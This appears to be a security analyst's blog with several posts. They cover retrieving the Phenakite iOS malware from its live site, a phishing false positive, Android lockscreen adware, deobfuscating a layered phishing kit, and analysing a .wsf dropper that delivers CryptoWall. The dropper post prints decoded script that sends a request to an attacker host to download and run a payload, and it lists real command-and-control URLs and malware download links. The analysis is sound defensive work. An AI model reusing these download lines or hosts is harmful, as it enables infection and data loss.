Grab your own copy of Phenakite iOS malware today

 Facebook has recently published a technical paper regarding a threat actor named APT-C-23.

Almost half of their report is about a new iOS malware that is in use by the threat actor.

Facebook called this malware Phenakite and provided 2 hashes of malware samples, however, those samples are not publicly available (yet).

Since I am Android type of person, naturally the Android malware interested me more than the iOS malware.

After playing a little with the Android malware, I decided to see what I can learn about the iOS malware, but how? I don't have any sample and I am quite clueless with Apple devices at every possible level. Well:

We don’t need bombs we got fire kites

Fortunately, the distribution site of the malware was still alive:

Well, not much to do other than download the app, well  the link is not directly the app apparently:

The file is binary, but also contains strings that might be interesting. There are several tools that parse mobileconfig files, a curious reader might try to parse the file for additional information, as this probably should trigger the download of the app after the policy is accepted.

But now what?

Feeling stuck? no worries I felt the same as well. Since I don't have iOS device to try it out, I decided to inspect the code of the website:

Oh look at that, commented code, that must be good :P

WhoOpSec!

There was also a reference to a file named app.plist lets try to grab it, shall we?

Ok, this is plain text and simple, the software package is app.ipa, lets grab that as well:

Ah, close, but no cigar, this hash doesn't match the two samples in Facebook report.

Could it be a new sample? doubt it, look at the date. So what is this file? ipa obviously! Not to be confused with IPA.

Essentially it is a Zip file, so lets unzip that payload:

I moved all the images to a folder to keep only the potentially interesting files from the archive, namely "app" stands out, what is it?

And that, kids, how I met your malware, e567efd5c800c5b0c6eb5aa0bccc10e9 , I met her on Facebook, report.

Congratulations, this is the first time the blog actually does what it stands for, sharing malware for everyone with a hint of analysis. (if you are reading this too late and the distribution site of the malware is down, no worries, it is also available at VirusTotal as a standalone and as an archive)

Now you can enjoy your own copy of Phenakite and start reversing the Mach-O if you know how to :)

Bonus lol's:

The terms of service of the malware is.... Lorem Ipsum :

The privacy is seem to be borrowed from "relatedcode.com" which has an open source chat for iOS repository, this is most likely the chat app that Facebook was referring to:

All your base is on fire:

More interesting strings:

phenakite.zip

MD5: 54e5e93c00c963cb66fd2d248c4c6ce7

SHA-1: 05527dddb79329d844f1954e3d36601926410bca

SHA-256: c2d66369c974558adbcd801b409492b73ad1cb5f9f412ef3a8820f1cae526903

app

MD5: e567efd5c800c5b0c6eb5aa0bccc10e9

SHA-1: da99195ff43093fb8237201e2ce412a925580a53

SHA-256: e1494164865acb719c1e32c86adf810ce52fcc48c46e777b9f98a99648de62c2

Fasterized Phishing Fail

Hi all, so this a quick and short post about an epic fail involving a bank, AV vendors and SaaS provider.

So, im minding my own business, thinking to go phishing some new shizzle, and all of the sudden le wild credit-agricole phish appears

checking VT and a whopping 10/67 results say this a phish! hide yo kids, hide yo pass
so me, as kind of n00b, thought, hey those people at those vendors have more experience, they must know what they talking about.
so i started to snoop around as that domain shadowing seemed quite interesting.
apparently the AV vendors dont know what they are doing, its either the horde detection, or bad detection algorithm, because as soon as i checked what it is i immediately found those funny domains belong to fasterize a service that act as a smart proxy for your site to reduce bandwidth and reduce load times of the pages, apparently it also the fast track to get your site blacklisted for "phishing" because the url mimic the real credit-agricole site.

conclusion, blacklisting is crap, there always will be another bad domain, but whitelisting would save the embarrassment here, i think fasterize is a new service and they should communicate with AV vendors with aggressive blacklists if they want to offer their service to banks.

bonus: they need to update their certificate

Android super charge crap lockscreen

its been a while, quite busy with... stuff...

but here is a quick post about something annoying.

after i have updated several apps on my android phone, suddenly i noticed a weird lock screen.

my first reaction was WTF, because after i swiped, my original lock screen appeared.

so i looked at list of updated applications, looked at all my installed apps, but nothing was really standing out.

so i looked in google, and it is appears to be a new trend for unknown reason.

here are few links:

http://forums.androidcentral.com/samsung-galaxy-s6-edge/512443-charging-screen-question.html

http://forums.androidcentral.com/samsung-galaxy-note-4/640251-new-speed-charge-battery-status-lock-screen-annoying-ads-just-appeared-gn4-2.html

http://android.stackexchange.com/questions/143330/what-is-this-lock-screen-with-ads-and-how-do-i-remove-it

http://androidforums.com/threads/speed-charge-on-lock-screen.1010631/

https://www.reddit.com/r/Android/comments/4g8hbq/psa_amber_weather_widget_223_adds_du_quick_charge/

https://www.reddit.com/r/galaxynote5/comments/45ahkp/wtf_the_ads_showing_on_the_charging_lock_screen/

and i even spotted one of the apps that have been updated to be on this thread:

https://www.reddit.com/r/nexus6/comments/4ilwcl/ive_had_my_nexus_6_since_release_today_it_asked/

so, i was quite confident this wasn't some malware (although i don't have anything worthy on my phone) and in the worst case im suffering some excessive battery drain (all those apps are fake shit, i hope you know that) and maybe i will get some ads, although i didnt get any :<

the easiest solution was of course just to uninstall the shit and see how it goes, but i decided to be more technical, and try to do some adb shell "magic" :

adb shell dumpsys window windows | grep -E 'mCurrentFocus|mFocusedApp'

so... it was indeed the photo editor...

here are some pictures of this magnificent app:

i must say that the settings actually worked, and it disabled that lock screen, and right after that i uninstalled it.

another note: the lock screen would appear only when the phone is charging (so you could  get the super duper mega fast charge boost)

base64 fileless phishing kit

Phishing kits are boring most of the time, and you cant fight stupid (users).
I have recently came across an interesting kit, thumbs up for the threat actor, if he only worked a bit on his e-mail that he sends to victims (cant share), and it could be much deadlier.

So how this works?
1) Threat actor sends bunch of emails to a big victim list, the email message is some "blabla please sign to DocuSign to view the document in google docs" etc...

Sometime the emails are in html formats so they change the <a href > tag so it would look like legit link when you hover over it, but when you click it sends to a different url.
In this case the attacker chose to use url shortening:
ht=tp://www.bit.ly/1Q5RMSN

This url is pointing to:
hXXp://jqueryapi.info/?getsrc=ok&ref=&url=data%3Atext%2Fhtml%3Bbase64%2CPFNjcmlwdCBMYW5ndWFnZT0nSmF2YXNjcmlwdCc%2BDQoNCmRvY3 ....

full url: http://pastebin.com/rPZ7Dzrt

JQuery you say? The data is base64 blob, if we copy the blob (starting with "PFN") to some decoder we will get some nice clear text like:

<Script Language='Javascript'>

document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67

full: http://pastebin.com/dbv30qp2

Bang, 2nd layer of obfuscation, a JS with unescape obfuscation.
After decoding that we get another clear text, with yet another script!
<script language="javascript" type="text/javascript">var l1l='=oQKpkyJ8dCK0lGbwNnLnkXYsB3cpRmMywHf

full: http://pastebin.com/Vu2mAzV6

Damn son, 3rd layer of obfuscation, with another JS code, containing eval and some custom encryption. Even if we beautify the code it still look nasty.
I don’t really care going all the code with debugger to see exactly what happens, and probably you as well, so lets create an html file with the JS code and change the "eval(_1OI(_1I1(l1l)));" function in the end to "window.alert(_1OI(_1I1(l1l)));"
This simply will print us the evaluated code in an alert box, and if we will open it in a browser we will get the result:

"eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+"

w00t? another eval with custom encryption? 4 obfuscation layers for phishing? dude, you are crazy!
Ok, lets do the trick of window.alert instead of eval again?
Unfortunately the new code is too long for the alert box so it is cut before the end and trying that trick will result an empty page.
So lets go back and change the "eval/window.alert" to "document.write".
We know it is safe to do because we saw in the first trick the output is eval, and not <script>.

full: http://pastebin.com/L3PrgjWK

Ok, now i got stuck for a while, because i tried to apply the previous methods and they didn’t work, while adding document.write to the eval would show the phishing page.
After some googling i found http://handlers.sans.org/dwesemann/decode/
Used #2 - The Tom Liston Method, i got in the result another eval that looked very familiar to the one i had, i thought maybe i did something wrong, so i pasted the output in my html page to show me code after "eval".
Once again the result was with "eval", this time i noticed there is a slight change to the code, so i continued changing my html with the output of showme().
After 3 or 4 times i ran this i got a new code in the text area:
"var _escape='%3C%21DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en%22%3E%0A%20%20%3Chead%3E%0A "

Another obfuscation!!!

full: http://pastebin.com/nHXBj5bB

Ok, this finally looks like the end of the saga, in the end there is a check if the user agent is Rambler or Yandex, Russian sites, guess the attacker is Russian and doesn’t want to phish his own people, another check for "Yaho" , guess this is a typo, and finally unescape the "var _escape" and write the pure html to the page.

So here is the final result: http://pastebin.com/xDLTHPTN
this was actually picked up by my ISP content filtering, so this 7 layer fileless obfuscation actually works quite well to bypass many filters.

TL:DR

block hXXp://www.ndsnotebook.com.br/wp-includes/css/themes/

.wsf malware?

So i've stumbled upon something "new", a .wsf file , this is basically a fancy .vbs file.

URL to sample (as sent in the mail from threat actor, the usual invoice bull crap)
hXXps://www.mediafire.com/download/q1yqupocyigke3k/INVOICE_8329380DF.doc_.wsf
mirror: https://malwr.com/analysis/YWY2NjY3ZDhlYzUwNGI4ZGE4OTZhNzE4NjFiNDcwYTY/

MD5	70ca3b4d70f564348e2d3ba903e78b5e
SHA1	e5023bd075a47b6de994d4ea7c757fa7ce7fcbb4
SHA256	9c007e99407b961ad34baa86b017867f75628f28b642e37ea1635ee5b1aa83e6

Now if we open that file we will see in the first line and few hundreds following a gibberish text like this:
 

"/*Gelder Sunbelt Discontent Hookey Chared
Precipiced 

Infarct Hydrostatics ..."

This is basically one big comment that is meant for evasion from AV/analysts/ninjas...

After few more lines you will find the end of the comment, start of the .wsf file (job), and a new comment...

"Torquing*/

<job>

/*Teleph"

More blablabla and we will find the most interesting part:

"Eviscerates Franking Anesthesiology Shamefaced
Streetlight Floorings*/

#@~^Wl8AAA==&JytksAmAhmU$kL?kxL!(ybn1.m$4[:wXVmp:Ph\X}hUd} s-3Hs\-"

 

The string "#@~^" indicates that this is encrypted vbs (.vbe), i have encountered such before, but i have never actually could find a good working method to decode them, up until now.

A user named "Hackoo" at stack overflow posted this nice code that does the job perfectly

http://stackoverflow.com/questions/32882622/convert-vbs-encrypted-script-to-string

After we decode the .vbe we get some more gibberish, like this:

"if (!nAkTeFqOrAeRcwmTaBmAhangdYaVmLhHuExSkLgEedqGrGwSuCnHatiScgug.fileexists(aIcNlbnOkdsItSgUnTihbIfcfBrGaakHgIfCiWwWdVfamwciqG+'\\qAcTyGsrkHlBagwS.doc')) {
//lPwCyOgfdAoXiflWaqeluLlDcGagxtrKaBbttMsIciwQgslGgXctbAlWmPmcmGfyyXsSbAnGavtDnEqTrEhyxMgZbBlEoQmLpBeShWuRhYkSbxxIuqpTrkmquSfAiRyDgibAhgrGgnmBwyxGuHkAaTbskrgOfUmFwMtmyGvIeHeQdVlytgqOrFuAfOpgrMiQoEqPaWqTaGcaeLgFdGkLkWxYngvKlanwyKbKtkktyUtxeAkYgYyEwimTomlagTcCpUeRmpqlkcaWgChAqVgGuRdZsHhBoBhFyAbObDnGyGxGcUcB
//agnXrHaNpCfKwOahkLiZnPmAufcPuAhbfbwnqPlLoOfpqGgDpRigbUpGdwmamBvazCgrzNgGhSwAagxKqvcucfxUdIoFsSvMdHdRmhiPpOkPcPrZsOtBqAqPpWhueVgUhMiWwOpLvUgWfEaKyigKwCpGePwZsMcZtupGvCzHuphGaElAnQemtgvZdMfurRaMwLhohRydbEkurKrGrVaUqdbVgtaKcFaymexPkRnclroHgLzQvBfFqwdAfGwLgZrDbAswtDlgrHegaZwkhUawdMmZrLhUhldoyQmRgAtEyRhSoVvFhqbWqMkcvEexzEsIcEhBeGtOflkFmdsdaPzYlbhTfWhkfRgQ
//gWytuPsKlhaZqAiwvLrCwYnAmFuOpGnihKdDlgcCrXtNuXzFdBbiaDtQgVfVvSgtqVrNdruFgOwQdWngpAaAqaeGgZvftLyzlGhDoYbdoZescppVoD
//hPpAwBiZmHbEynvxighIdqgObGvOhXcXaDpUgdyWxokZrFxBoXpFkWxupOzGrCpVgzoCgZkidCqVoGxFoGrUqFaqfTuFcOgAoFafkzyBlofKtBxogCgIyOsGrWtBiOfnpYlOcQwEyRvlyMsvbYnGdQqDhrxVfCvOzQ
//aEsHkVkRxDnVgRiqpWpBxevQtAcXaGyzmGaOiAytybmklWlGgExmyHwDkAqvdPlYyunTdBfWzruVhkxGalrVxOlMtbthvRkFmQfPmXaVkApHpQgMpygybUfYdgbOgWmAivnXuefBaTslahgYgGgHyZimuasTmasGkPlBgRqLuAnToZfGgtaSsSnakeovlOaxwqdsaPgSpRdtsIaSwyxGltfRbezSrfdCfgqDaZnYbakyaAgEbCbItruGgMdBdYsGxQfYsTncgPdCudaUoatVbFuQiYmAtAcYrNaNcblRdGwBlaoTqRiVgIcIvXfWoDfHoQvBoXdOpXiWcAuSrPqewNeUbEgDgntKfdoceyobqDaSpSuEaDpDwKylvEqCpWvcdTnYncyevCpGaHiTfBsYkGyBrfpIbDtIhFaBbYmYeCwGhGcHssgYipvKsMvTaXttgynQosgCgU
var  bQgadMaXdIiIfPuOyCpZfZxocXlLmZslmtgSbV=WScript.CreateObject('MSXML2.XMLHTTP');
bQgadMaXdIiIfPuOyCpZfZxocXlLmZslmtgSbV.open('PUT','http://aolmessenger.su/update/check.php',false);
bQgadMaXdIiIfPuOyCpZfZxocXlLmZslmtgSbV.send();" 

Again, the threat actor using // comments to make the untrained eye to fail to find "http://aolmessenger.su/update/check.php"

So after removing the comments from the decrypted .vbe we end up with an easy .vbs file that connects to:

http://aolmessenger.su/update/check.php 

and

http://aolmessenger.su/update/info.doc

You think the threat actor finished with trying to fool us? Think again, here comes the most interesting stuff:

In sandbox analysis the .wsf file drops and .com (PE) and .doc file.

You can see that in the decoded .vbe strings:

"zHqnrMwaqnaHscsuvNsZyGkSetgTsMsywT.Exec(aIcNlbnOkdsItSgUnTihbIfcfBrGaakHgIfCiWwWdVfamwciqG + '\\uarQrKkeoPnqnOgAgHfZ.com');

gUntydcFbSphhglgyWeNgDkZgYuNlBoDxm.SaveToFile(aIcNlbnOkdsItSgUnTihbIfcfBrGaakHgIfCiWwWdVfamwciqG + '\\qAcTyGsrkHlBagwS.doc');"

The .doc file is clean and it is a decoy to the .wsf file, the file that is saved is actually named "INVOICE_8329380DF.doc                                                                                                                                                                                                           .wsf"

So even if you have extensions enabled in view, all the blank spaces move the extension so you barely see it, and the user thinks that he opened a .doc file, so he expects a .doc file to be opened, which actually happens with this dummy file.

doc md5:  03dc2be6251417386887ed968482deb2

Now, check.php with PUT request in the .vbe caused to download .com file

But if you try to go to that URL yourself you will get this little fella:

x-mas.jpg - md5: b2d625408dfc0347e8202c9ccd36adbb

This nice x-mass greeting is in Russian (Хуй? пизда? джигурда!)

And the two words are common curse words, the 3rd one stumbled me and i have found the explanation for this phrase: https://www.youtube.com/watch?v=foodjSqrAh0

If you don’t know Russian that put the English captions, they are hilarious! 

So it looks like yet another method of keeping ninjas out, but i have the .com file from the sandbox analysis, maybe if i tried getting it with put like the .vbs or changing user agent i would get it as well.

So what is this final payload? Oh this is just cryptowall (4?)

md5: 908185de411e7e513535599540932caa

https://www.virustotal.com/en/file/3751e64b78af7b5a6d7ccecc0f65b427f4164eefa9ddc8155fcf75be6cb78951/analysis/

https://malwr.com/analysis/MWIyZDI5ODkzZjM3NGVkYjkwZjliMTIzNThiY2NjMmE/

How do i know it is cryptowall? If your sandbox is good, the malware will decrypt files, delete shadow volume, and will create help_decrypt files that say welcome to the cryptowall family.

Every time i ran it i got different C&C, here are some:

elautech.com/dHgZQD.php?x=98xxxj2adv49w4q (212.172.221.11)
newtone.pl/dJE2Ok.php?g=98xxxj2adv49w4q (91.232.4.242)
shadowdent.ro/KqSF6e.php?w=8mbts9497st8rg (93.115.52.160)
hoffice.nu/t6mWjF.php?y=e08xpt0rx54jh (188.40.99.15)
frenchies.eu/ncgkiT.php?o=2qs3f6poq2h (62.210.178.117)
new-media-consulting.org/8rm6Sc.php?t=55oerfob715 (81.169.145.164)
enguzelilahiler.com/jwtfq9.php?f=yes6nej17cvj0r (178.32.234.11)

From quick search it looks like the C&C are compromised servers

http://www.zone-h.org/mirror/id/25059579

The dropped files domain (aolmessenger.su) looks fairly new, and if you wasn’t sure the threat is Russian here is another nail to the coffin:

http://ping-admin.ru/free_test/result/14498571195o2374qcyhqmr253e03v1.html

Looks like the actor wanted to verify his new domain is reachable 

and some registrant info:

http://domains.ihead.ru/domains/whois2.html?d=AOLMESSENGER&tld=su

Intro

Hi all, and welcome to my blog.
This is an introduction post to my blog, which will have posts about the adventures of a junior security analyst, the opinions and thoughts expressed here are my own and all that bla bla...
In our area of cyber security that threats always change, i have found that personal blog posts are the best source for information, i have learned myself a lot from such posts, and i will constantly add blogs to my reading list, as soon as i figure out how it works.
I thought about opening my own blog for a while now, to share back, but i haven't got anything interesting to write about, up until recently.
So this blog should have posts in an easy and detailed way so other people could use the info to learn new things as i did.
So stay tuned for the soon to be first detailed post about a threat i have found.